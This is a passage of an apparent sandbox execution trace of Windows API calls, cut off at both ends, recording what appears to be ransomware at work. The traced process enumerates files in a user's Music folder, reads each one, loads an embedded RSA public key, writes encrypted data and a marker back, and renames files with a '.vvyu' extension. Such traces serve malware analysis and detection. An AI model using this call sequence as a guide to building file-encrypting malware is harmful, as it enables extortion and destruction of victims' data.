(HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0198.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0198.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68a8 | out: hHeap=0x2c0000) returned 1 [0198.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0198.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0198.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0198.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0198.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0198.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0198.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0198.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0198.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0198.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0198.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0198.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6890 | out: hHeap=0x2c0000) returned 1 [0198.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0198.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0198.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0198.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6878 | out: hHeap=0x2c0000) returned 1 [0198.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaad0 | out: hHeap=0x2c0000) returned 1 [0198.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0198.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0198.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0198.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0198.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.178] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xb459, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xb459, lpOverlapped=0x0) returned 1 [0198.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0198.180] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb45e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.180] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0198.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0198.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0198.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0198.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0198.181] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0198.182] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.182] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.182] CloseHandle (hObject=0x584) returned 1 [0198.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0198.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0198.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0198.184] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\mlh8UPb9YMlbt.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\mlh8upb9ymlbt.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\mlh8UPb9YMlbt.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\mlh8upb9ymlbt.mp3.vvyu")) returned 1 [0198.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0198.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.186] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edcf8 | out: hHeap=0x2c0000) returned 1 [0198.188] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7af5f380, ftCreationTime.dwHighDateTime=0x1d8a04b, ftLastAccessTime.dwLowDateTime=0x25602a90, ftLastAccessTime.dwHighDateTime=0x1d8a14e, ftLastWriteTime.dwLowDateTime=0x25602a90, ftLastWriteTime.dwHighDateTime=0x1d8a14e, nFileSizeHigh=0x0, nFileSizeLow=0x101a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zPa wj4.m4a", cAlternateFileName="ZPAWJ4~1.M4A")) returned 1 [0198.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0198.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edcf8 [0198.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0198.189] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\zPa wj4.m4a") returned=".m4a" [0198.189] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\znTr-YRiXJ\\zPa wj4.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\zntr-yrixj\\zpa wj4.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0198.190] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=65956) returned 1 [0198.190] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0198.194] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1017e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.194] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0198.196] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0198.196] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.197] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x101a4, lpOverlapped=0x0) returned 1 [0198.198] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.198] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0198.198] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.198] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.198] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b8e8) returned 1 [0198.199] CryptCreateHash (in: hProv=0x31b8e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0198.199] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.199] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0198.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0198.199] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0198.199] GetLastError () returned 0x0 [0198.199] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0198.199] CryptReleaseContext (hProv=0x31b8e8, dwFlags=0x0) returned 1 [0198.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0198.200] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0198.200] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0198.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.200] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0198.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0198.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0198.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x101a0) returned 0x2af7168 [0198.201] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0198.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0198.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0198.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0198.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0198.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeaad0 [0198.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6878 [0198.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aeab18 [0198.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6890 [0198.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68c0 [0198.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6920 [0198.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68d8 [0198.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0198.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0198.202] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0198.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0198.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0198.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0198.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6920 [0198.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0198.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68d8 [0198.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae68c0 [0198.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0198.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0198.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0198.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0198.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0198.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0198.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0198.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0198.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68d8 | out: hHeap=0x2c0000) returned 1 [0198.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0198.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae68c0 | out: hHeap=0x2c0000) returned 1 [0198.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0198.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6920 | out: hHeap=0x2c0000) returned 1 [0198.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0198.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0198.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0198.206] GetCurrentThreadId () returned 0x5d8 [0198.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0198.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5180 [0198.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0198.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0198.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0198.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0198.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0198.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.206] GetCurrentThreadId () returned 0x5d8 [0198.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0198.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0198.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0198.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0198.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0198.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0198.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0198.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0198.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0198.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6920 [0198.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0198.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0198.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68c0 [0198.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0198.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae68d8 [0198.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0198.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae68a8 [0198.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0198.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6938 [0198.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0198.210] RtlAllocateHeap (HeapHandle=0x2c0000, 